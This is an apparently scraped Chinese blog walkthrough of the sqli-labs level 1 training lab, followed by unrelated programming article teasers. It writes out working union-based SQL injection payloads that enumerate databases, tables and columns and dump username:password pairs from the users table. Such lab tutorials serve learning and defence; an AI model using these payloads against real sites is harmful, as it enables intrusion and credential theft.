当前位置：首页 > news >正文

解密 sqli靶场第一关：一步一步学习 SQL 注入技术

news 2026/1/28 19:47:37

目录

一、判断是否存在注入点

二、构造类似?id=1' --+的语句

三、判断数据表中的列数

四、使用union联合查询

五、使用group_concat()函数

六、爆出数据库中的表名

七、爆出users表中的列名

八、爆出users表中的数据

🌈嗨！我是Filotimo__🌈。很高兴与大家相识，希望我的博客能对你有所帮助。

🎁欢迎大家给我点赞👍、收藏⭐️，并在留言区📝与我互动，这些都是我前进的动力！

🌟我的格言：森林草木都有自己认为对的角度🌟。

打开 sqli靶场第一关，以下是通关思路：

一、判断是否存在注入点

首先进行初步的试探，构造?id=1 and 1=1，页面正常

构造?id=1 and 1=2，页面正常

继续构造?id=1' and '1'='1，页面正常

构造?id=1' and '1'='2 ，页面无回显，判断为字符型注入。

二、构造类似?id=1' --+的语句

构造类似?id=1' --+的语句，我们可以在 ?id=1' 和 --+ 中间插入select语句，进行我们想要的操作。

在这个注入尝试中，' 是一个闭合单引号，用于关闭原始的查询语句中的引号，并添加注释符 -- 来注释掉后续的语句。+ 是空格的URL编码表示，用于在URL中表示空格。

三、判断数据表中的列数

这一步是为了使用union联合查询。

构造?id=1' order by 5 --+，出现如图回显，说明5超出了数据表中列的范围

构造?id=1' order by 4 --+，仍然超出

构造?id=1' order by 3 --+，正常回显，说明当前表只有3列

四、使用union联合查询

联合查询是 sql中用于将两个或多个查询的结果集组合成一个结果集的操作。使用union联合查询的前提是被联合的查询必须拥有相同数量的列，列的数据类型必须兼容。

构造如下语句：

?id=1' union select 1,2,schema_name from information_schema.schemata--+

后来发现只回显了数据库的第一行

继续构造

?id=' union select 1,2,schema_name from information_schema.schemata--+

这里去掉了id=1'中的1，使其为空。结果是我们终于回显出了数据库名

五、使用group_concat()函数

group_concat()函数是 MySQL 中的聚合函数，用于将多行数据按照指定的分隔符连接为一个字符串。

这里我们可以使用group_concat()函数，一次性的把库名显示出来：

?id=' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

六、爆出数据库中的表名

我们可以爆出数据库中的表名了，这里以information_schema为例

构造如下语句：

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

七、爆出users表中的列名

构造如下语句获得users表中的列名：

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

八、爆出users表中的数据

我们还能继续获得信息

（1）查看users表中所有的用户：

?id=' union select 1,2,group_concat(username) from security.users --+

（2）查看users表中所有的用户密码：

?id=' union select 1,2,group_concat(password) from security.users --+

（3）concat_ws(':',A,B)函数拼接信息：

这里可以用concat_ws(':',A,B)函数，拼接用户名和密码，使其成对出现

?id=' union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

sqli靶场第一关通关思路到此结束

解密 sqli靶场第一关：一步一步学习 SQL 注入技术

目录一、判断是否存在注入点二、构造类似?id1 --的语句三、判断数据表中的列数四、使用union联合查询五、使用group_concat()函数六、爆出数据库中的表名七、爆出users表中的列名八、爆出users表中的数据 🌈嗨！我是Filotimo__🌈。很…...

编程日记 2023/11/26 20:22:18

Flask 使用Jinja2模板引擎

Jinja2，由Flask框架的创作者开发，是一款功能丰富的模板引擎，以其完整的Unicode支持、灵活性、高效性和安全性而备受推崇。最初受Django模板引擎启发，Jinja2为Flask提供了强大的模板支持，后来也成为其他项目的首选。在本…...

编程日记 2023/11/26 20:20:17

C/C++内存管理,malloc,realloc,calloc,new,delete详解！！！

1.初步了解内存中各个区间存储的数据特征 1.栈区：存储一些局部变量、函数参数、返回值等，跟函数栈振有关，出了作用域，生命周期结束。 2.堆区：用于动态开辟空间，如果不主动销毁空间，则程序运行结…...

编程日记 2023/11/26 20:18:14

高级JVM

一、Java内存模型 1. 我们开发人员编写的Java代码是怎么让电脑认识的首先先了解电脑是二进制的系统，他只认识 01010101比如我们经常要编写 HelloWord.java 电脑是怎么认识运行的HelloWord.java是我们程序员编写的，我们人可以认识，但是电脑不…...

编程日记 2023/11/26 20:17:13

论文阅读——MCAN（cvpr2019）

补充一下MCAN-VQA： 对图片的处理：首先输入图片到Faster R-CNN，会先设定一个判断是否检测到物体的阈值，这样动态的生成m∈[10,100]个目标，然后从检测到的对应的区域通过平均池化提取特征。第i个物体特征表示为&#xff…...

编程日记 2023/11/26 20:16:11

mac电脑文件比较工具 UltraCompare 中文for mac

UltraCompare是一款功能强大的文件和文件夹比较工具，用于比较和合并文本、二进制和文件夹。它提供了丰富的功能和直观的界面，使用户能够轻松地比较和同步文件内容，查找差异并进行合并操作。以下是UltraCompare软件的一些主要特点和功能&…...

编程日记 2023/11/26 20:15:10

XML Schema 的extension 元素

XML Schema 的extension 元素对complexContent、simpleContent元素进行扩展。例如，下面通过增加了两个属性，对simpleContent进行了扩展： <xs:element name"condition" maxOccurs"unbounded" minOccurs"0"…...

编程日记 2023/11/26 20:14:09

每日一题2023.11.26——打印沙漏【PTA】

题目要求： 本题要求你写个程序把给定的符号打印成沙漏的形状。例如给定17个“*”，要求按下列格式打印 ************ *****所谓“沙漏形状”，是指每行输出奇数个符号；各行符号中心对齐；相邻两行符号数差2；…...

编程日记 2023/11/26 20:13:08

【C++】类和对象——拷贝构造和赋值运算符重载

上一篇我们讲了构造函数，就是对象实例化时会自动调用，那么，我们这里的拷贝构造在形式上是构造函数的一个重载，拷贝构造其实也是一种构造函数，那么我们就可以引出这里的规则 1.拷贝构造函数的函数名必须与类名相同。 2.…...

编程日记 2023/11/26 20:12:07

基于acme免费申请泛域名证书

参考文档：https://github.com/acmesh-official/acme.sh 文章目录 step1: 获取阿里云的ak、skstep2: 安装acmestep3: 安装通配符证书step4: 查看证书step5: 证书的使用step6: 删除证书 step1: 获取阿里云的ak、sk export Ali_Key"LTAI5tG8888888CDoEjLzkE"…...

编程日记 2023/11/26 20:11:06

系列十九、Spring实例化bean的方式

一、概述所谓实例化bean，大白话讲就是Spring如何把这一个个的普通的Java对象创建为Spring bean的。二、方式 Spring中实例化bean常用的有以下四种，即： ① 构造器方式； ② 静态工厂方式； ③ 实例工厂方式；…...

编程日记 2023/11/26 20:10:05

WordPress无插件实现css、js加速实现动静态分离

“Wordpress网站现在普遍较慢”，其实是没有做好优化罢了，像我的网站生成页面的时间才0.06s,而且我这网站还有提速的机会呢，如css、js使用CDN加速，实现动静态分离，我安装过，Memcache和PHP加速脚本就已经让我…...

编程日记 2023/11/26 20:09:04

2017年五一杯数学建模B题自媒体时代的消息传播问题解题全过程文档及程序

2017年五一杯数学建模 B题自媒体时代的消息传播问题原题再现电视剧《人民的名义》中人物侯亮平说：“现在是自媒体时代，任何突发性事件几分钟就传播到全世界。”相对于传统媒体，以互联网技术为基础的自媒体以其信息传播的即时性、交往方式…...

编程日记 2023/11/26 20:08:03

虹科分享 | AR世界揭秘：从二维码的起源到数据识别与位姿技术的奇妙融合！

引言：探索AR的神奇世界，我们将从二维码的诞生谈起。在这个科技的海洋中，二维码是如何帮助AR实现数据获取与位姿识别的呢？让我们一起揭开这层神秘的面纱！ 一、二维码的由来二维码是将数据存储在图形中的技术&#xff…...

编程日记 2023/11/26 20:07:01

基于helm部署并配置StorageClass

此类方法适用于测试环境或者小型的集群环境，因为nfs是网络文件系统，在io性能上并不能有所保证。前置条件： 已部署k8s集群已安装helm 工具 step1: 安装nfs服务 yum install nfs-utils -ystep2: 配置nfs # 编辑/etc/exports /data/nfs *(r…...

编程日记 2023/11/26 20:04:58

Python基础：字符串详解（需补充完善）

1. 字符串定义在Python中，字符串是一种数据类型，用于表示文本数据。字符串是由字符组成的序列，可以包含字母、数字、符号和空格等字符。在Python中，你可以使用单引号（）或双引号（"&#x…...

编程日记 2023/11/26 20:03:57

做直播服务器要什么样的配置呢？

现在直播行业越来越火爆，大大小小的平台或者企业都选择通过直播卖货的方式出售产品，直播的内容还有观看直播的人数等等都影响了服务器的配置需求，今天小编就给大家讲一讲吧！ 1、内存：直播服务器需要足够的内存才能支持…...

编程日记 2023/11/26 20:02:56

⑥【bitmap 】Redis数据类型： bitmap [使用手册]

个人简介：Java领域新星创作者；阿里云技术博主、星级博主、专家博主；正在Java学习的路上摸爬滚打，记录学习的过程~ 个人主页：.29.的博客学习社区：进去逛一逛~ Redis bitmap ⑥Redis bitmap 基本操作命令1. …...

编程日记 2023/11/26 20:01:55

CentOS升级GCC

背景 CentOS 7默认自带GCC版本4.8，而目前工作中开发环境需要用到GCC8和GCC12，这里记录一下如何升级GCC版本，以及如何多版本并存。参考： CentOS升级gcc-知乎 Redhat7上安装Red Hat Developer Toolset并自由切换gcc和g的版本 Cent…...

编程日记 2023/11/26 19:59:53

CodeWhisperer 体验总结

CodeWhisperer 体验总结 | CodeWhisperer 是一款亚马逊新推出的通用代码生成器可以实时进行代码数据的提供还可以定义安全问题 CodeWhisperer 对个人用户是免费使用企业用户需要订阅使用亚马逊云科技开发者社区为开发者们提供全球的开发技术资源。这里有技术文档、开发案例…...

编程日记 2023/11/26 19:57:50

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章传送阵>> 点我查看说明：假设每台服务器已…...

编程新知 2026/1/28 18:07:35

MPNet：旋转机械轻量化故障诊断模型详解python代码复现

目录一、问题背景与挑战二、MPNet核心架构 2.1 多分支特征融合模块（MBFM） 2.2 残差注意力金字塔模块（RAPM） 2.2.1 空间金字塔注意力（SPA） 2.2.2 金字塔残差块（PRBlock） 2.3 分类器设计三、关键技术突破 3.1 多尺度特征融合 3.2 轻量化设计策略 3.3 抗噪声…...

编程新知 2026/1/26 20:42:47

解决Ubuntu22.04 VMware失败的问题 ubuntu入门之二十八

现象1 打开VMware失败 Ubuntu升级之后打开VMware上报需要安装vmmon和vmnet，点击确认后如下提示最终上报fail 解决方法内核升级导致，需要在新内核下重新下载编译安装查看版本 $ vmware -v VMware Workstation 17.5.1 build-23298084$ lsb_release…...

编程新知 2026/1/24 10:07:40

import java.util.Arrays; import java.util.Scanner;public class DemoTest3 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的区别while (in.hasNextLine()) { // 注意 while 处理多个 caseint a in.nextIn…...

编程新知 2026/1/28 11:11:03